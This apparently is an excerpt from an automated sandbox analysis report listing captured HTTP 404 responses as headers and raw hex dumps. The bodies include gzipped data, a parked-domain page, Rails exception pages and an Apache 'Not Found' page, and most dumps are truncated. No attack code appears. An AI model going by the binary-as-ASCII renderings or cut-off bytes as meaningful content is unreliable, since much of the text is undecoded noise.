                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 10 Dec 2024 15:24:31 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 10 Dec 2024 15:24:34 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 10 Dec 2024 15:24:37 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Tue, 10 Dec 2024 15:24:39 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 679f2543-3481-4a3d-a4e3-5e9e2ad5c117x-runtime: 0.029777content-length: 17134connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: b48f66f8-e84b-437c-80bf-e31ef0255395x-runtime: 0.021908content-length: 17154connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 5325af3b-84a0-482b-ab46-c4e2842ab007x-runtime: 0.021576content-length: 18170connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 15:23:20 GMTServer: Apache/2.4.10 (Debian)Content-Length: 275Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 6c 69 6f 6e 2e 6e 65 74 